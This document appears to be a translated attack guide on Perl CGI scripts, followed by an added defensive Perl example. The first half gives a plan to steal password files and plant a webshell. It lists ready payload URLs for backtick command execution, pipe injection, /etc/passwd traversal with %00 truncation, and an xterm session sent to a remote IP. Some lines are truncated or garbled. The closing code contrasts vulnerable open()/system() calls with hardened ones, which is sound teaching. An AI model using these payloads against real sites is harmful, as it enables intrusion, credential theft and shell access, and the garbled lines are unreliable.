General idea: bypass restrictions, view sensitive files and password-related files, write a one-line CGI shell, get into the back end and try to upload the webshell (if the back end adds authentication or an MD5 check, try spoofing the cookie and submitting it locally), find the executable directory and the related functions, and take the shell..." Privilege escalation
Vulnerabilities in Perl scripts are mostly in open(), system() or backtick (``) calls. open() allows reading, writing and execution; the latter two allow execution.
If the form is sent by POST the trick usually fails (%00 will not be parsed there), so we mostly use GET.
http://target.com/cgi-bin/home/news/sub.pl?12 the normal request; construct variants of it
http://target.com/cgi-bin/home/news/sub.pl?& change one character; it may get executed
http://target.com/cgi-bin/home/news/sub.pl?`ls` command in backticks
http://target.com/cgi-bin/home/news/sub.pl?`id`
http://target.com/cgi-bin/home/news/sub.pl?`IFS= !;uname!-a`
http://target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` a good trick: cat the script's own source back to the browser
http://target.com/test.pl;ls|
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0 +%26|
http://target.com/test.pl?'id' same as the backtick operations above: execute whatever you construct. For example `cat<'/home1/siteadm/cgi-bin/home/news/test.pl'` displays the .pl source.
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 injection in the same spirit as SQL injection in ASP
http://target.com/test.pl?&........ /../../etc/passwd
http://www.target.org/cgi-bin/cl ... info.pl?user=./test prefixed with ./
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 do not drop the trailing %00
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00
http://www.target.org/show.php?f ... /include/config.php View php code
http://www.target.org/show.php?f .. .ng/admin/global.php
A word of emm and ps
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20>bbb%20|
http://www.target.org/cgi-bin/club/scripts 'less showpost.pl' and search (with '/') for the 'Select' string
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http the .elf here is a feature of the CCS Chinese Linux operating system
http://www.target.org/csapi/..%c0%afhttp/china.sh"+.elf?"+&+ls+/bin
Scripts with an .html suffix are a related technique worth digging into further, but it is undeniable that submitting query statements as data is also an effective method.
http://target.com/index.html#cmd.exe
http://target.com/index.html?dummyparam=xp_cmdshell
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
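As an added illustration of the open()/system()/backtick point above, and not code from the original page, the following Perl shows each of those three call sites in the form that lets the listed payloads through, beside a hardened form. $DOCROOT, the parameter names and the sample inputs are constructed for the example.

```perl
#!/usr/bin/perl
# Added example, not from the original page. Run with `perl -T` to have
# taint mode flag any unvalidated CGI value that reaches open()/system().
use strict;
use warnings;

my $DOCROOT = '/var/www/pages';    # assumed document root for the example

# VULNERABLE: two-argument open() parses the string. A leading '<', '>' or
# '>>' selects a mode and a leading or trailing '|' turns the rest into a
# command, so page=|ls -la /| executes ls and page=../../etc/passwd reads
# outside the document root. Older Perls handed an embedded NUL (%00) to
# the C library, which truncated the name at that byte.
sub read_page_vulnerable {
    my ($page) = @_;
    open(my $fh, $page) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# VULNERABLE: a single string given to backticks or system() goes through
# /bin/sh whenever it contains shell metacharacters, so ';', '|', '`' and
# a newline inside $dir each start a new command.
sub list_dir_vulnerable {
    my ($dir) = @_;
    return `ls -la $dir`;
}

# HARDENED: allow-list the parameter with an anchored regex, build the path
# yourself from the captured (and thereby untainted) value, and use the
# three-argument open() so the mode is a literal and the third argument is
# only ever a file name.
sub read_page_hardened {
    my ($page) = @_;
    return undef unless defined $page && $page =~ /\A([A-Za-z0-9_-]{1,64})\z/;
    my $file = "$DOCROOT/$1.html";
    open(my $fh, '<', $file) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# HARDENED: the list form of system() never invokes a shell; each element
# is one argv entry. '--' stops ls from reading a value like '-R' as an
# option. With the same allow-list, no metacharacter reaches exec().
sub list_dir_hardened {
    my ($dir) = @_;
    return undef unless defined $dir && $dir =~ /\A([A-Za-z0-9_-]{1,64})\z/;
    my $rc = system('ls', '-la', '--', "$DOCROOT/$1");
    return $rc == 0;
}

# Run constructed inputs, including the page's own payload shapes, through
# the allow-list to show what the hardened functions accept before they
# touch the filesystem.
my @inputs = ('news', '../../etc/passwd', '|ls -la /|', '`id`', "news\0");
for my $input (@inputs) {
    (my $shown = $input) =~ s/[^\x20-\x7e]/?/g;   # make the NUL visible
    my $verdict = $input =~ /\A[A-Za-z0-9_-]{1,64}\z/ ? 'accepted' : 'rejected';
    printf "%-22s %s\n", $shown, $verdict;
}
```

Only `news` is accepted; the traversal, pipe, backtick and NUL-terminated inputs are all rejected by the allow-list before open() or system() ever sees them, which is the check the vulnerable forms above lack.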